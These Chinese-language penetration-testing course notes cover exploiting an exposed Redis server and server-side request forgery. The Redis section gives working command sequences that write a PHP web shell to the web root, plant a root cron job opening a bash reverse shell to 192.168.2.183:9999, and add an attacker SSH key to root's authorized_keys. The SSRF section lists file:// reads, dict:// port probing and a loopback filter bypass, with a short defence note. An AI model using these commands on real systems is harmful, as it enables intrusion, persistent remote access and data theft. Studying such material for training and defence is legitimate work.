day34_kls

课程内容

redis

写webshell

利用持久化存储写webshell

1
2
3
4
5
redis-cli -h  -p
CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SET test "<!--?php system($_GET['cmd']); ?-->"
SAVE

写计划任务

利用条件

目标机器为centos系列

cetnos系列cron会略过错误的行

原理与写webshell相同

1
2
3
4
5
redis-cli -h  -p
CONFIG SET dir /var/spool/cron/
CONFIG SET dbfilename root
set test "\n\n\n * * * * * /bin/bash -i >& /dev/tcp/192.168.2.183/9999 0>&1  \n\n\n"
SAVE

写ssh public key

1
2
3
4
5
redis-cli -h  -p
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
set test "\n\n\n your_key\n\n"
SAVE

ssrf

原因

开发者未对用户可控的url进行限制,导致服务器请求到恶意的url

危害

内网探测

信息泄漏

挖掘

白盒

是否存在用户可控的服务器访问url

黑盒

参数中存在url就可劲干

验证是否存在漏洞

http

dnslog

利用

文件读取

file:///path/to/file

端口探测

dict://host:ip

防御

过滤恶意协议

禁止访问内网ip

绕过防御

对于127.0.0.1

使用127.1.1.1等类似ip绕过